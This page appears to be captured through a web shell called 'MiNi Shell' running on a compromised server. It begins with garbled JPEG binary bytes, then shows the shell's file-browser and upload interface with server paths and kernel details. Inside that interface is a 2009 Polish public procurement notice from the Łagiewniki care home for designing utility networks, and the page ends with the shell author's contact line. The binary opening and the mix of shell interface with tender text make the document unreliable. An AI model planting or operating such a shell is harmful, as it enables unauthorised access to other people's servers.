JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090416/107556-N-2009.html

<p class="kh_header"><b>Chmielnik: WYKONANIE PROJEKTU BUDOWLANO - WYKONAWCZEGO PRZEBUDOWY I REMONTU SIECI UZBROJENIA ZEWNĘTRZNEGO TERENU  I BUDYNKÓW  DPS W ŁAGIEWNIKACH</b><br>
<b>Numer ogłoszenia: 107556 - 2009; data zamieszczenia: 16.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Łagiewnikach , Łagiewniki 73, 26-020 Chmielnik, woj. świętokrzyskie, tel. 041 3542076, faks 041 3543050.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lagiewniki.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE PROJEKTU BUDOWLANO - WYKONAWCZEGO PRZEBUDOWY I REMONTU SIECI UZBROJENIA ZEWNĘTRZNEGO TERENU  I BUDYNKÓW  DPS W ŁAGIEWNIKACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zaprojektowanie przebudowy i remontu sieci uzbrojenia zewnętrznego terenu   i budynków  DPS w Łagiewnikach na działkach o numerach Nr:312/1 ; 312/2 ; 312/3 ; 312/6 ; 312/9 ; 312/14 ; 312/17.

Informujemy , że budynek mieszkalny oddziału Nr I  i obszar DPS wpisany jest do rejestru zabytków i podlega ochronie konserwatorskiej Świętokrzyskiego Wojewódzkiego Konserwatora Zabytków w Kielcach.

 Projekt powinien obejmować wykonanie: 1) wykonanie map sytuacyjno-wysokościowych dla celów projektowych, w zakresie niezbędnym do opracowania przedmiotowej dokumentacji w skali 1: 500, 2) podziemnej sieci energetycznej od punktu pomiarowego zlokalizowanego w budynku agregatu  prądotwórczego ( w tym wymiana lub remont rozdzielnicy ) do budynku oddziału Nr I ( w którym również znajduje się rozdzielnica do przebudowy z której zasilane są następujące budynki : kotłownia, budynek mieszkalny Nr 1, Nr 2, Nr 2A, Nr 3, kaplica i budynek mieszkalny oddziałów Nr II - IV;   lub do nowej rozdzielnicy umiejscowionej na skwerku przy budynku tego oddziału) o dł. od ok.140 do             400 mb (w zależności od przyjętej koncepcji),
3) oświetlenia uliczno - parkowego terenu wraz z siecią zasilająca oraz słupami oświetleniowymi ulicznymi ok. 18 szt. i parkowymi ok.24 szt. wraz z oprawami w wersji energooszczędnej 4)  sieci preizolowanej  c.o. i c. w. u. o dł. ok. 400 mb, 5) sieci kanalizacyjnej wraz z szambem spełniającym rolę odstojnika,                                                             6) sieci wodociągowej ok.300 mb,  7) sieci telekomunikacyjnej podziemnej (ok.140mb)               wraz z kablem do monitoringu (telewizji przemysłowej ).

Wykonawca przystąpi do opracowania dokumentacji budowlano - wykonawczej                           po pisemnym zaakceptowaniu  koncepcji całego zamówienia.

Dokumentacje projektową należy opracować zgodnie z :
1.	Rozporządzeniem Ministra Infrastruktury z dnia 03.07.2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. z  2003r. Nr 120 ,              poz. 1133 z  późn .zm.).
2.	Rozporządzeniem Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego              ( Dz. U z 2004r. Nr 202, poz.2072),
3.	Ustawą z dnia 07.07.1994r. - Prawo Budowlane ( tj. Dz. U. z 2006r. Nr 156, poz.1118 z  późn. zmianami),
Warunkiem koniecznym przy wykonywaniu projektu jest posiadanie odpowiednich uprawnień ,  o których mowa w art. 14 ust.1 w zakresie określonym w art.14 ust 3                   pkt 1 ustawy  z dnia 07.07.1994r. - Prawo Budowlane ( tj. Dz. U. z 2006r. Nr 156, poz.1118    z  późn. zmianami), a także przynależności do izby samorządu zawodowego.

W  szczególności projekt budowlano - wykonawczy powinien obejmować:

a)	projekt budowlano- wykonawczy dla potrzeb budowy zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 03.07.2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. z 2003r. Nr 120 , poz. 1133 z późn .zm.)                                   i  Rozporządzenia Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego             ( Dz. U z 2004r. Nr 202, poz.2072), ustawy z dnia 07.07.1994r. - Prawo Budowlane            ( tj. Dz. U. z 2006r. Nr 156, poz.1118  z  późn. zmianami),
             projekt budowlany -  5 egzemplarzy w wersji papierowej i 1 egzemplarz w wersji  
             elektronicznej na płycie CD.
b)	projekt wykonawczy - 1 egzemplarz w wersji papierowej i 1 egzemplarz w wersji elektronicznej na płycie CD,
c)	1 egzemplarz specyfikacji technicznej wykonania i odbioru robót  w branży elektrycznej, osobne dla sieci energetycznej i oświetlenia uliczno - parkowego                    w formie papierowej   i 1 egzemplarz w wersji elektronicznej na płycie CD,     
d)	1 egzemplarz specyfikacji technicznej wykonania i odbioru robót instalacyjnych                   w zakresie sieci, instalacji i urządzeń cieplnych , wodociągowych i kanalizacyjnych osobno dla sieci  c.o  i  c. w. u. ;  sieci wodociągowej , sieci kanalizacyjnej w formie papierowej  i  1 egzemplarz    w wersji elektronicznej na płycie CD,
e)	po 1 egzemplarzu : kosztorys inwestorski i przedmiar robót w branży elektrycznej, osobne dla sieci energetycznej i oświetlenia uliczno - parkowego oraz branży instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych , wodociągowych                       i kanalizacyjnych osobno dla sieci  c.o  i  c. w. u. ;  sieci wodociągowej , sieci kanalizacyjnej -  w ogólnodostępnym programie ,
f)	na jednej płycie CD w wersji elektronicznej mogą być wszystkie w/w elementy projektu budowlano - wykonawczego.


Dokumentacje projektową należy uzgodnić z jednostkami wyszczególnionym w decyzji                  o lokalizacji inwestycji celu publicznego oraz uzyskać inne niezbędne uzgodnienia potrzebne do uzyskania pozwolenia na budowę i realizację. Koszt wszystkich uzgodnień pokrywa Wykonawca.
Na każdym etapie projektowania będzie wymagane zachowanie ścisłego kontaktu                            z Zamawiającym i dokonanie pisemnych uzgodnień zakresu prac projektowych.

W celu sprawnego prowadzenia procesu projektowego niezbędne będzie przygotowanie treści niezbędnych wniosków np.
- wniosek o warunkach lokalizacji inwestycji celu publicznego ( zgodnie z zawartą umową)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
a)  spełniają warunki określone w art.22 oraz nie podlegają wykluczeniu z postępowania
     o zamówienie publiczne z art. 24 , zgodnie z ustawa z dnia 29 stycznia 2004r. - Prawo 
     zamówień  publicznych  ( Dz. U. z 2007r.  Nr  223, poz.1655   oraz  z  2008r.  Nr 171,    
     poz.1058, z  późn. zmianami),
b)  wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania minimum
     jedną usługę w zakresie projektowania , której charakter był podobny do wymienionego
     wyżej zamówienia. Jeżeli okres prowadzenia działalności jest krótszy - wykonali te usługi
     w tym okresie,
c)  posiadają odpowiednie uprawnienia zgodnie z ustawa z dnia 7 lipca 1994 r. Prawo
     budowlane ( tj. Dz. U. z  2006r. Nr 156, poz.1118 z  poźn. zmianami) w branżach dla 
     projektantów i sprawdzających : instalacyjnej w zakresie sieci, instalacji i urządzeń
     elektrycznych i elektroenergetycznych;  instalacyjnej w zakresie sieci, instalacji i urządzeń
     cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
d)  przynależą do właściwej terytorialnie dla miejsca zamieszkania Izby Zawodowej zgodnie
     z art. 12 ust. 7 w/w ustawy odpowiednio we wszystkich branżach.
Sposób oceny warunków: ocena dokonana zostanie na podstawie złożonych przez Wykonawcę oświadczeń lub dokumentów, wg. formuły: spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu określonego                             w punkcie VIII  SIWZ oferta musi zawierać następujące dokumenty i oświadczenia:
   1)  formularz ofertowy z wykorzystaniem wzoru- załącznik nr 1 do SIWZ,  2)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
      działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub
       zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej
       niż  6 miesięcy przed upływem terminu składania ofert,  3)  oświadczenie wykonawcy ( wg. załącznika Nr 2 do SIWZ ), że:
      - spełnia warunki określone w art.22 ustawy Pzp,
      - nie podlega wykluczeniu s postępowania na podstawie art.24 ustawy Pzp.
 4)   sporządzony przez Wykonawcę wykaz zrealizowanych dokumentacji projektowych
       w ostatnich trzech latach, zawierający nazwę, zakres, okres realizacji , adres i telefon
       inwestora - wg. załącznika Nr 3 do SIWZ , wymagane jest  wykonanie co najmniej jednej pracy 
      projektowej zgodnej z wymaganiami określonymi w punkcie VIII b,
 5) sporządzony przez Wykonawcę wykaz osób , którymi dysponuje lub będzie dysponował
      i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich
      kwalifikacji zawodowych i wykształcenia niezbędnych do wykonania zamówienia, 
      a także wykonywanych przez nie czynności - wg. załącznika Nr 6 do SIWZ,
 6)  aktualna przynależność do właściwej terytorialnie dla miejsca zamieszkania Izby 
      Zawodowej zgodnie  z art. 12 ust. 7 ustawy Prawo budowlane odpowiednie w branżach.
     Złożone dokumenty mogą być kopią dokumentów potwierdzona przez wykonawcę
     za zgodność z oryginałem.

Zamawiający zgodnie z art. 26 ust.3 i ust.4 ustawy Pzp, wezwie tych Wykonawców , którzy w określonym terminie nie złożą  oświadczeń lub dokumentów wymaganych w punkcie IX niniejszej SIWZ, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia lub dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone oświadczenia lub dokumentu  powinny potwierdzać spełnianie przez  Wykonawcę warunków udziału w niniejszym postępowaniu oraz spełniać przez oferowane usługi wymagań określonych przez Zamawiającego , nie później niż w dniu , w  którym upłynął termin składania ofert. Zamawiający , w razie potrzeby, wezwie również Wykonawców do złożenia wyjaśnień dotyczących złożonych oświadczeń lub dokumentów. Brak uzupełnienia  (oświadczeń lub dokumentów) z a także brak złożenia ewentualnych wyjaśnień przez Wykonawcę w wyznaczonym przez Zamawiającego terminie  spowoduje wykluczenie tego Wykonawcy z postępowania a złożona oferta zostanie uznana za odrzuconą - art. 24 ust.2 pkt 3) i art. 24 ust.4 ustawy Pzp.
Zgodnie z art.23 ustawy Pzp Wykonawcy  mogą  wspólnie ubiegać się o zamówienie.
Uwaga: zmiana osób w wykazie  ( załączniku Nr 6 do SIWZ) będzie możliwa przy zachowaniu co najmniej takiego samego wykształcenia zawodowego i kwalifikacji..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lagiewniki.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Łagiewnikach, Łagiewniki 73, 26 - 020 Chmielnik                             woj. Świętokrzyskie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2009 godzina 12:00, miejsce: Dom Pomocy Społecznej w Łagiewnikach, Łagiewniki 73, 26 - 020 Chmielnik                             woj. Świętokrzyskie, kasa DPS..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com